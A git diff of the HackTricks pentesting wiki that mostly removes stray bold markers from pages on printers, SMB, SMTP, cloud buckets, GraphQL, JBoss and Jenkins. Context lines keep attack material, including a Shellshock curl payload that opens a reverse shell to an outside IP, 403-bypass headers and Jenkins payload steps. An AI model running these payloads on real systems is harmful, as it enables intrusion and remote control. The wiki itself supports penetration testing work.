@@ -126,53 +126,53 @@ While plugged-in USB drives do **not offer a bidirectional channel**, their usag ### Cross-site printing Abusing **client web request** an attacker can **abuse arbitrary printers** inside the internal network of the client connected to his malicious web page.\ -[**Learn how can this be possible here.**](cross-site-printing.md)**** +[**Learn how can this be possible here.**](cross-site-printing.md) ### Abusing Spooler service in AD If you can find any **Spool service listening** inside the domain, you may be able to **abuse** is to **obtain new credentials** and **escalate privileges**.\ -[**More information about how to find a abuse Spooler services here.**](../../windows/active-directory-methodology/printers-spooler-service-abuse.md)**** +[**More information about how to find a abuse Spooler services here.**](../../windows/active-directory-methodology/printers-spooler-service-abuse.md) ## Privilege Escalation ### Factory Defaults There are several possible ways to **reset** a device to factory defaults, and this is a security-critical functionality as it **overwrites protection mechanisms** like user-set passwords.\ -[**Learn more here.**](factory-defaults.md)**** +[**Learn more here.**](factory-defaults.md) ### **Accounting Bypass** You may be able to **impersonate existent or non-existent users** to print pages using their accounts or **manipulate** the hardware or software **counter** to be able to print more pages.\ -[**Learn how to do it here.**](accounting-bypass.md)**** +[**Learn how to do it here.**](accounting-bypass.md) ### **Scanner and Fax** Accessing the Scanner of Fax functionalities you may be able to access other functionalities, but this all of this is vendor-dependent.\ -****[**Learn more here.**](scanner-and-fax.md)**** +[**Learn more here.**](scanner-and-fax.md) ## **Print job access** ### **Print Job Retention** Jobs can be **retained in memory** and be **printed** again in a **later moment from the control panel**, or 
using **PostScript** you can even **remotely access all the jobs that are going to be printed, download them** and print them.\ -[**Learn more here.**](print-job-retention.md)**** +[**Learn more here.**](print-job-retention.md) ### **Print Job Manipulation** You can **add new content** to the pages that are printed, **change all the content** that is going to be printed or even **replace just certain letters or words.**\ -****[**Learn how to do it here.**](print-job-manipulation.md)**** +[**Learn how to do it here.**](print-job-manipulation.md) ## **Information Disclosure** ### **Memory access** You may be able to **dump** the **NVRAM** memory and **extract sensitive** info (like passwords) from there.\ -[**Read how to do that here.**](memory-access.md)**** +[**Read how to do that here.**](memory-access.md) ### **File system access** You may be able to **access the file system** abusing **PJL** or **PostScript**.\ -[**Read how to do that here.**](file-system-access.md)**** +[**Read how to do that here.**](file-system-access.md) ### **Credentials Disclosure/Brute-Force** 
@@ -184,31 +184,31 @@ You may be able to **disclosure the password** being using abusing **SNMP** or t ### **Buffer Overflows** Several **buffer overflows** have been **found** already in **PJL input** and in the **LPD daemon**, and there could be more.\ -[**Read this for more information.**](buffer-overflows.md)**** +[**Read this for more information.**](buffer-overflows.md) ### Firmware updates You may be able to **make the printer update the driver to a malicious one** specially crafted by you.\ -[**Read this for more information.**](firmware-updates.md)**** +[**Read this for more information.**](firmware-updates.md) ### **Software Packages** - printer vendors have started to introduce the **possibility to install custom software on their devices** but information is not publicly available. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors.\ -[**Read more about this here.**](software-packages.md)**** +printer vendors have started to introduce the **possibility to install custom software on their devices** but information is not publicly available. 
The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors.\ +[**Read more about this here.**](software-packages.md) ## **Denial of service** ### **Transmission channel** Occupying all the **connections** and **increasing** the **timeout** of the server could lead to a DoS.\ -[**Learn more about this here.**](transmission-channel.md)**** +[**Learn more about this here.**](transmission-channel.md) ### **Document Processing** You can use **PostScript** and **PJL** to perform **infinite loops**, **redefine commands** to avoid any printing, **turn off** any printing functionality or even **set the printer in offline mode**.\ -[**Learn more about this here.**](document-processing.md)**** +[**Learn more about this here.**](document-processing.md) ### **Physical damage** One could **abuse PJL** or **PostScript** to **write** in the **NVRAM** hundreds of thousands of times with the goal of **breaking the chip** or at least make the **parameters be frozen** intro the factory default ones.\ -[**Learn more about this here.**](physical-damage.md)**** +[**Learn more about this here.**](physical-damage.md) diff --git a/pentesting/pentesting-printers/buffer-overflows.md b/pentesting/pentesting-printers/buffer-overflows.md index 6fa2adfb..1aaf32d1 100644 --- a/pentesting/pentesting-printers/buffer-overflows.md +++ b/pentesting/pentesting-printers/buffer-overflows.md @@ -45,4 +45,4 @@ A simple **LPD fuzzer** to test for buffer overflows can be created using the `l ./lpdtest.py printer in "`python -c 'print "x"*150'`" ``` -**You can find more information about these attacks in** [**http://hacking-printers.net/wiki/index.php/Buffer\_overflows**](http://hacking-printers.net/wiki/index.php/Buffer\_overflows)**** +**You can find more information about these attacks in** [**http://hacking-printers.net/wiki/index.php/Buffer\_overflows**](http://hacking-printers.net/wiki/index.php/Buffer\_overflows) 
diff --git a/pentesting/pentesting-printers/credentials-disclosure-brute-force.md b/pentesting/pentesting-printers/credentials-disclosure-brute-force.md index 9298f3bf..f71bff2b 100644 --- a/pentesting/pentesting-printers/credentials-disclosure-brute-force.md +++ b/pentesting/pentesting-printers/credentials-disclosure-brute-force.md @@ -83,4 +83,4 @@ Device unlocked with password: 0 -**More information about Password Disclosure and Brute-Force in** [**http://hacking-printers.net/wiki/index.php/Credential\_disclosure**](http://hacking-printers.net/wiki/index.php/Credential\_disclosure)**** +**More information about Password Disclosure and Brute-Force in** [**http://hacking-printers.net/wiki/index.php/Credential\_disclosure**](http://hacking-printers.net/wiki/index.php/Credential\_disclosure) diff --git a/pentesting/pentesting-printers/document-processing.md b/pentesting/pentesting-printers/document-processing.md index dbf5b59e..df6becce 100644 --- a/pentesting/pentesting-printers/document-processing.md +++ b/pentesting/pentesting-printers/document-processing.md @@ -89,4 +89,4 @@ from printing or re-connecting to the device. Press CTRL+C to abort. Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM! ``` -**Learn more about these attacks in** [**http://hacking-printers.net/wiki/index.php/Document\_processing**](http://hacking-printers.net/wiki/index.php/Document\_processing)**** +**Learn more about these attacks in** [**http://hacking-printers.net/wiki/index.php/Document\_processing**](http://hacking-printers.net/wiki/index.php/Document\_processing) diff --git a/pentesting/pentesting-printers/file-system-access.md b/pentesting/pentesting-printers/file-system-access.md index cac7110e..cf4274c0 100644 --- a/pentesting/pentesting-printers/file-system-access.md +++ b/pentesting/pentesting-printers/file-system-access.md 
@@ -84,4 +84,4 @@ d - webServer d - xps ``` -**Learn more about possible sandbox bypasses using PostScript and PJL limitations in** [**http://hacking-printers.net/wiki/index.php/File\_system\_access**](http://hacking-printers.net/wiki/index.php/File\_system\_access)**** +**Learn more about possible sandbox bypasses using PostScript and PJL limitations in** [**http://hacking-printers.net/wiki/index.php/File\_system\_access**](http://hacking-printers.net/wiki/index.php/File\_system\_access) diff --git a/pentesting/pentesting-printers/memory-access.md b/pentesting/pentesting-printers/memory-access.md index 0d39f2c3..24a4c529 100644 --- a/pentesting/pentesting-printers/memory-access.md +++ b/pentesting/pentesting-printers/memory-access.md @@ -34,4 +34,4 @@ Certain **Xerox printer models** have a proprietary **PostScript** `vxmemfetch` } repeat ``` -**More information here:** [**http://hacking-printers.net/wiki/index.php/Memory\_access**](http://hacking-printers.net/wiki/index.php/Memory\_access)**** +**More information here:** [**http://hacking-printers.net/wiki/index.php/Memory\_access**](http://hacking-printers.net/wiki/index.php/Memory\_access) diff --git a/pentesting/pentesting-printers/physical-damage.md b/pentesting/pentesting-printers/physical-damage.md index e28566e0..e4c35192 100644 --- a/pentesting/pentesting-printers/physical-damage.md +++ b/pentesting/pentesting-printers/physical-damage.md 
@@ -1,6 +1,6 @@ # Physical Damage - Long-term settings for printers and other embedded devices are stored in non-volatile memory ([NVRAM](https://en.wikipedia.org/wiki/Non-volatile\_random-access\_memory)) which is traditionally implemented either as [EEPROM](https://en.wikipedia.org/wiki/EEPROM) or as [flash memory](https://en.wikipedia.org/wiki/Flash\_memory). Both components have a limited lifetime. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. +Long-term settings for printers and other embedded devices are stored in non-volatile memory ([NVRAM](https://en.wikipedia.org/wiki/Non-volatile\_random-access\_memory)) which is traditionally implemented either as [EEPROM](https://en.wikipedia.org/wiki/EEPROM) or as [flash memory](https://en.wikipedia.org/wiki/Flash\_memory). Both components have a limited lifetime. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. ### PJL @@ -42,4 +42,4 @@ PostScript can run a script that corrupts its own NVRAM: } loop ``` -**More information about these techniques can be found in** [**http://hacking-printers.net/wiki/index.php/Physical\_damage**](http://hacking-printers.net/wiki/index.php/Physical\_damage)**** +**More information about these techniques can be found in** [**http://hacking-printers.net/wiki/index.php/Physical\_damage**](http://hacking-printers.net/wiki/index.php/Physical\_damage) diff --git a/pentesting/pentesting-printers/transmission-channel.md b/pentesting/pentesting-printers/transmission-channel.md index cdda1cbf..31b8f28c 100644 --- a/pentesting/pentesting-printers/transmission-channel.md +++ b/pentesting/pentesting-printers/transmission-channel.md 
@@ -1,6 +1,6 @@ # Transmission channel -If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. +If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. Basic DoS: @@ -34,4 +34,4 @@ TIMEOUT=15 [2 RANGE] While the PJL reference specifies a maximum timeout of 300 seconds, in practice maximum PJL timeouts may range from 15 to 2147483 seconds.\ Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open. -**Learn more about this attack in** [**http://hacking-printers.net/wiki/index.php/Transmission\_channel**](http://hacking-printers.net/wiki/index.php/Transmission\_channel)**** +**Learn more about this attack in** [**http://hacking-printers.net/wiki/index.php/Transmission\_channel**](http://hacking-printers.net/wiki/index.php/Transmission\_channel) diff --git a/pentesting/pentesting-rsh.md b/pentesting/pentesting-rsh.md index 9e8d9e62..c4adccd9 100644 --- a/pentesting/pentesting-rsh.md +++ b/pentesting/pentesting-rsh.md @@ -17,5 +17,5 @@ rsh domain/user@ rsh domain\\user@ ``` -### [**Brute Force**](../brute-force.md#rsh)**** +### [**Brute Force**](../brute-force.md#rsh) diff --git a/pentesting/pentesting-smb.md b/pentesting/pentesting-smb.md index e72ca048..e6e0f896 100644 --- a/pentesting/pentesting-smb.md +++ b/pentesting/pentesting-smb.md 
@@ -7,9 +7,9 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtai Discover **The PEASS Family**, our collection of exclusive **NFTs** -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -26,7 +26,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. **SMB** stands for ‘**Server Message Blocks**’. Server Message Block in modern language is also known as **Common Internet File System**. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network. -For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as you point out, port 445. On other systems, you’ll find services and applications using port 139. This means that SMB is running with NetBIOS over TCP/IP\*\*.\*\* (extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for)) +For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as you point out, port 445. On other systems, you’ll find services and applications using port 139. This means that SMB is running with NetBIOS over TCP/IP**.** (extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for)) ``` 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) @@ -61,7 +61,7 @@ nbtscan -r 192.168.0.1/24 To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can: * Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version** -* **\*\*\_Or** this script\*\*: +* \_Or** this script**: ```bash #!/bin/sh diff --git a/pentesting/pentesting-smtp/README.md b/pentesting/pentesting-smtp/README.md index 538a906e..52d1a68a 100644 --- a/pentesting/pentesting-smtp/README.md +++ b/pentesting/pentesting-smtp/README.md 
@@ -255,7 +255,7 @@ A **complete guide of these countermeasures** can be found in [https://seanthege **Sender Policy Framework** (SPF) provides a mechanism that allows MTAs to check if a host sending an email is authorized.\ Then, the organisations can define a list of authorised mail servers and the MTAs can query for this lists to check if the email was spoofed or not.\ -**\*\*In order to define IP addresses/ranges, domains and others that** are allowed to send email on behalf a domain name**, different "**Mechanism\*\*" cam appear in the SPF registry. +In order to define IP addresses/ranges, domains and others that** are allowed to send email on behalf a domain name**, different "**Mechanism**" cam appear in the SPF registry. #### Mechanisms diff --git a/pentesting/pentesting-smtp/smtp-commands.md b/pentesting/pentesting-smtp/smtp-commands.md index d71fc43a..887607bd 100644 --- a/pentesting/pentesting-smtp/smtp-commands.md +++ b/pentesting/pentesting-smtp/smtp-commands.md @@ -1,6 +1,6 @@ # SMTP - Commands -**Extracted from:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)**** +**Extracted from:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/) **HELO**\ It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name. diff --git a/pentesting/pentesting-vnc.md b/pentesting/pentesting-vnc.md index b64c3144..8457f1e9 100644 --- a/pentesting/pentesting-vnc.md +++ b/pentesting/pentesting-vnc.md @@ -19,7 +19,7 @@ nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p msf> use auxiliary/scanner/vnc/vnc_none_auth ``` -### ****[**Brute force**](../brute-force.md#vnc) +### [**Brute force**](../brute-force.md#vnc) ## Connect to vnc using Kali diff --git a/pentesting/pentesting-web/403-and-401-bypasses.md b/pentesting/pentesting-web/403-and-401-bypasses.md index 6befe245..77f9259b 100644 
--- a/pentesting/pentesting-web/403-and-401-bypasses.md +++ b/pentesting/pentesting-web/403-and-401-bypasses.md @@ -14,11 +14,11 @@ Try using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE, * Try to [**use other User Agents**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) to access the resource. * **Fuzz HTTP Headers**: Try using HTTP Proxy **Headers**, HTTP Authentication Basic and NTLM brute-force (with a few combinations only) and other techniques. To do all of this I have created the tool [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass). - * `X-Originating-IP: 127.0.0.1` + * `X-Originating-IP: 127.0.0.1` * `X-Forwarded-For: 127.0.0.1` * `X-Forwarded: 127.0.0.1` * `Forwarded-For: 127.0.0.1` - * `X-Remote-IP: 127.0.0.1` + * `X-Remote-IP: 127.0.0.1` * `X-Remote-Addr: 127.0.0.1` * `X-ProxyUser-Ip: 127.0.0.1` * `X-Original-URL: 127.0.0.1` @@ -58,7 +58,7 @@ If _/path_ is blocked: * /FUZZ/secret * /secretFUZZ * **Other API bypasses:** - * /v3/users\_data/1234 --> 403 Forbidden + * /v3/users\_data/1234 --> 403 Forbidden * /v1/users\_data/1234 --> 200 OK * {“id”:111} --> 401 Unauthriozied * {“id”:\[111]} --> 200 OK diff --git a/pentesting/pentesting-web/README.md b/pentesting/pentesting-web/README.md index a9f6ccf3..b263b963 100644 --- a/pentesting/pentesting-web/README.md +++ b/pentesting/pentesting-web/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -246,7 +246,7 @@ Tools: * [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.** * [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ` * [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ` -* ****[**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs. +* [**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs. **Recommended dictionaries:** 
@@ -279,7 +279,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri * _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773) * **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**. * If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** (using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page. -* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex\)/)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)**** +* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex\)/)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird) * Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik you can use the project 
[**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access. * **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/). diff --git a/pentesting/pentesting-web/artifactory-hacking-guide.md b/pentesting/pentesting-web/artifactory-hacking-guide.md index 17ed99c9..00579c85 100644 --- a/pentesting/pentesting-web/artifactory-hacking-guide.md +++ b/pentesting/pentesting-web/artifactory-hacking-guide.md @@ -1,6 +1,6 @@ # Artifactory Hacking guide -**This content was taken from** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory)**** +**This content was taken from** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory) ## Artifactory basics diff --git a/pentesting/pentesting-web/buckets/README.md b/pentesting/pentesting-web/buckets/README.md index d36bed93..0056c72e 100644 --- a/pentesting/pentesting-web/buckets/README.md +++ b/pentesting/pentesting-web/buckets/README.md @@ -2,7 +2,7 @@ A good tool to review your configuration in several clouds is: [https://github.com/nccgroup/ScoutSuite](https://github.com/nccgroup/ScoutSuite) -****[**AWS S3 hacking tricks**](aws-s3.md)**** +[**AWS S3 hacking tricks**](aws-s3.md) **More info:** diff --git a/pentesting/pentesting-web/buckets/aws-s3.md b/pentesting/pentesting-web/buckets/aws-s3.md index 76d08805..1eef694f 100644 --- a/pentesting/pentesting-web/buckets/aws-s3.md +++ b/pentesting/pentesting-web/buckets/aws-s3.md 
@@ -202,7 +202,7 @@ docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4 ### Get Snapshots -Notice that _\*\*_AWS allows you to make snapshots of EC2's and databases (RDS). The main purpose for that is to make backups, but people sometimes use snapshots to get access back to their own EC2's when they forget the passwords. +Notice that _**_AWS allows you to make snapshots of EC2's and databases (RDS). The main purpose for that is to make backups, but people sometimes use snapshots to get access back to their own EC2's when they forget the passwords. Look for snapshots this user has access to (note the **SnapshotId**): @@ -261,10 +261,10 @@ If you want to read about how can you exploit meta-data in AWS [you should read {% embed url="https://github.com/tomdev/teh_s3_bucketeers" %} -\*\*\*\* + ## **List of Open Buckets** {% embed url="https://buckets.grayhatwarfare.com/" %} -\*\*\*\* + diff --git a/pentesting/pentesting-web/buckets/firebase-database.md b/pentesting/pentesting-web/buckets/firebase-database.md index aca55999..95346edc 100644 --- a/pentesting/pentesting-web/buckets/firebase-database.md +++ b/pentesting/pentesting-web/buckets/firebase-database.md @@ -69,4 +69,4 @@ You may be able to access some interesting information ## References * [https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/](https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/) -* [https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1) +* [https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1) diff --git a/pentesting/pentesting-web/cgi.md b/pentesting/pentesting-web/cgi.md index 3d63b2b7..f3d03353 100644 --- a/pentesting/pentesting-web/cgi.md +++ b/pentesting/pentesting-web/cgi.md 
@@ -34,7 +34,7 @@ curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bi curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh ``` -\*\*\*\*[**Shellsocker**](https://github.com/liamim/shellshocker)\*\*\*\* +[**Shellsocker**](https://github.com/liamim/shellshocker) ```bash python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi diff --git a/pentesting/pentesting-web/code-review-tools.md b/pentesting/pentesting-web/code-review-tools.md index 832326f7..c7b43068 100644 --- a/pentesting/pentesting-web/code-review-tools.md +++ b/pentesting/pentesting-web/code-review-tools.md @@ -2,7 +2,7 @@ ## General -[**https://owasp.org/www-community/Source\_Code\_Analysis\_Tools**](https://owasp.org/www-community/Source_Code_Analysis_Tools#)\*\*\*\* +[**https://owasp.org/www-community/Source\_Code\_Analysis\_Tools**](https://owasp.org/www-community/Source_Code_Analysis_Tools#) ```bash https://www.sonarqube.org/downloads/ diff --git a/pentesting/pentesting-web/flask.md b/pentesting/pentesting-web/flask.md index 9e8a67db..bd0c273a 100644 --- a/pentesting/pentesting-web/flask.md +++ b/pentesting/pentesting-web/flask.md @@ -20,7 +20,7 @@ echo "ImhlbGxvIg" | base64 -d The cookie is also signed using a password -### **Flask-Unsign** +### **Flask-Unsign** Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. diff --git a/pentesting/pentesting-web/graphql.md b/pentesting/pentesting-web/graphql.md index 95e0bd7c..87cca699 100644 --- a/pentesting/pentesting-web/graphql.md +++ b/pentesting/pentesting-web/graphql.md 
@@ -315,9 +315,9 @@ For more information **check the** [**original post here**](https://blog.doyense ## References -* \*\*\*\*[**https://jondow.eu/practical-graphql-attack-vectors/**](https://jondow.eu/practical-graphql-attack-vectors/)\*\*\*\* -* \*\*\*\*[**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)\*\*\*\* -* [**https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4**](https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4)\*\*\*\* -* [**http://ghostlulz.com/api-hacking-graphql/**](http://ghostlulz.com/api-hacking-graphql/)\*\*\*\* -* \*\*\*\*[**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.m**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md)\*\*\*\* -* \*\*\*\*[**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)\*\*\*\* +* [**https://jondow.eu/practical-graphql-attack-vectors/**](https://jondow.eu/practical-graphql-attack-vectors/) +* [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) +* [**https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4**](https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4) +* [**http://ghostlulz.com/api-hacking-graphql/**](http://ghostlulz.com/api-hacking-graphql/) +* 
[**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.m**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md) +* [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) diff --git a/pentesting/pentesting-web/jboss.md b/pentesting/pentesting-web/jboss.md index e9b666c2..15a9de08 100644 --- a/pentesting/pentesting-web/jboss.md +++ b/pentesting/pentesting-web/jboss.md @@ -9,8 +9,9 @@ You can expose **management servlets** via the following paths within JBoss (dep * /web-console/Invoker (JBoss versions 6 and 7) * /invoker/JMXInvokerServlet and /invoker/EJBInvokerServlet (JBoss 5 and prior) -**You can enumerate and even exploit a JBOSS service using** [**clusterd**](https://github.com/hatRiot/clusterd)****\ -**Or using metasploit:** `msf > use auxiliary/scanner/http/jboss_vulnscan` +**You can enumerate and even exploit a JBOSS service using** [**clusterd**](https://github.com/hatRiot/clusterd)\ +**Or using metasploit:** +`msf > use auxiliary/scanner/http/jboss_vulnscan` ### Exploitation diff --git a/pentesting/pentesting-web/jenkins.md b/pentesting/pentesting-web/jenkins.md index 52d66ecc..60f5a473 100644 --- a/pentesting/pentesting-web/jenkins.md +++ b/pentesting/pentesting-web/jenkins.md 
@@ -23,7 +23,7 @@ You may be able to get the Jenkins version from the path _**/oops**_ or _**/erro ## Login You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**\ -****Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). +Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). ### Bruteforce @@ -67,7 +67,7 @@ This method is very noisy because you have to create a hole new project (obvious 2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._ 3. Click **Build now** -**** + Go to the projects and check **if you can configure any** of them (look for the "Configure button"): diff --git a/pentesting/pentesting-web/moodle.md b/pentesting/pentesting-web/moodle.md index af7d16fe..2b9bbe03 100644 --- a/pentesting/pentesting-web/moodle.md +++ b/pentesting/pentesting-web/moodle.md 
